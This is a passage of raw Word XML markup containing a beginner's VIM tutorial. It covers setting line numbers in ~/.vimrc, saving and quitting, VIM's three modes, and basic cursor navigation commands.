          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vim ~/.vimrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add this line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to temporarily add line numbers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="739"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:set number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Open and Close VIM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open a file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vim filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit VIM:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B40">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save and exit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:wq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit without saving: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:q!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B46">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Modes in VIM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B47">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VIM has three primary modes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Normal mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Default mode for navigation and commands. Press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Esc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enter this mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insert mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: For text editing. Press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 to start inserting text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: For saving, exiting, or running commands. Press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to enter command mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B4D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Basic Navigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the cursor:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="119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h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Left</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="119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l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Right</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="119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j</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="119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k</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move by words:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="119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w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Next word</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="119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b</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Previous word</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move to line start/end:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="119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 Beginning of the line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="119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End of the line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to specific line: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:&lt;line_number&gt;</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:10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to go to line 10)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1192"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> :set number</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to temporarily see line numbers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the cursor to the begin/end of file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start of file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">End of file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">G</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
